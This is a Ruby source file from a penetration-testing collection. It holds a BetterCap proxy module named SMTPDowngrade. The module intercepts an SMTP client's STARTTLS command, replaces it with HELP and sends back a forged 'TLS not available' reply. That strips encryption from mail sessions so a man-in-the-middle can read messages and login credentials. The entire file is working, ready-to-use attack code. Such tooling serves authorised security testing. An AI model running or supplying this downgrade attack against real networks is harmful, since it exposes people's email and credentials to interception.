mgeeky-Penetration-Testing-.../networks/smtpdowngrade.rb

43 lines
1.3 KiB
Ruby

=begin
Author : @mgeeky
Email : mb@binary-offensive.com
This project is released under the GPL 3 license.
=end
class SMTPDowngrade < BetterCap::Proxy::TCP::Module
meta(
'Name' => 'SMTPDowngrade',
'Description' => 'Downgrades SMTP encryption by returning deny to STARTTLS request.',
'Version' => '1.0.0',
'Author' => 'mgeeky - mb@binary-offensive.com - https://github.com/mgeeky',
'License' => 'GPL3'
)
def on_response(event)
if @respondwith != nil
BetterCap::Logger.info "[#{'SMTP Downgrade'.green}] Lying that SMTP server does not support SSL/TLS."
event.data = @respondwith
@respondwith = nil
end
BetterCap::Logger.raw "\n#{BetterCap::StreamLogger.hexdump( event.data )}\n"
end
def on_data(event)
@respondwith = smtp_parse_request(event)
end
def smtp_parse_request(event)
return nil if not event.data
if event.data =~ /^STARTTLS.*/
BetterCap::Logger.info "[#{'SMTP Downgrade'.green}] Intercepted STARTTLS command."
@respondwith = "454 4.7.0 TLS not available due to local problem\r\n"
event.data = "HELP\r\n"
end
BetterCap::Logger.raw "\n#{BetterCap::StreamLogger.hexdump( event.data )}\n"
end
end